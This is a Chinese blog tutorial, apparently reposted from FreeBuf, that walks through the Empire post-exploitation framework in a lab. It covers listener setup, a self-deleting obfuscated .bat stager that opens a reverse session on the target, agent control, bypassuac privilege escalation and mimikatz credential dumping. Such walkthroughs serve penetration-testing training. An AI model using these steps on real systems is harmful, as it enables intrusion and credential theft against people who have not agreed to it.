记录黑客技术中优秀的内容,传播黑客文化,分享黑客技术精华

内网渗透 day14-empire基础命令的使用

2020-11-16 16:23

empire的基础操作

1. 建立监听器

help    查看帮助命令

wps1

listeners     查看监听器

wps2

uselistener  xxx     使用监听器模块

常用的监听模块:http

按两次tab键查看能使用的监听器模块

wps3

wps4

info    查看参数信息

wps5

设置参数

set Name xxx

wps6

set Host http://xxx

wps7

set Port xxx

wps8

wps9

执行:execute

wps10

main 返回主菜单

这边显示目前有一个活跃的监听器

wps11


2. 设置stagers

usestagers xxx   使用stager模块

常用的模块:windows/hta、windows/launcher_bat

按两次tab键查看能使用的stager模块

wps12

wps13

info  查看要设置的参数

wps14

set Listener xx     设置监听器

wps15

set OutFile /var/www/html/launcher.bat 设置文件生成路劲

wps16

delete   木马运行完是否自动删除

Obfuscate(混淆)

wps17

execute 执行

wps18

在靶机上双击bat文件成功反弹会话

wps19


3. 用户交互

agents 切换到用户列表

wps20

list 列出用户

wps21

rename 修改用户ID的名字

wps22

interact 进入到用户交互界面

wps23

sysinfo     查看系统信息

wps24

sc  截屏

wps25

wps26

searchmodule 搜索模块

wps27

shell + command 执行命令

wps28

spawn 迁移到新的用户需要指定监听器的名字

wps29

wps30

产生了一个新的会话

wps31

用户清除:

kill agents | all

wps32

监听器清除:

kill listener | all

wps33


4. 提权

绕过uac

bypassuac  <listener>      bypassuac绕过uac提权

wps34

可以看到产生了一个带*的会话,提权成功用户名前面会多一个*号

wps35

mimikatz      在拥有权限后可以利用mimikatz获取用户账号密码

wps36

creds         以列表的形式显示mimikatz获取的账号密码

wps37

uac提权(需要手动确认)

searchmodule ask 搜索ask模块

wps38

usemodule privesc/ask       使用privesc/ask模块

wps39

info    查看所需参数

wps40

设置监听器

wps41

run   执行

wps42

靶机弹出uac认证框

wps43

列表中产生新的管理员会话

wps44


知识来源: https://www.freebuf.com/sectool/254894.html

阅读:174346 | 评论:0 | 标签:渗透

想收藏或者和大家分享这篇好文章→复制链接地址

“内网渗透 day14-empire基础命令的使用”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

黑帝公告 📢

永久免费持续更新精选优质黑客技术文章Hackdig,帮你成为掌握黑客技术的英雄

↓赞助商 🙇🧎

标签云 ☁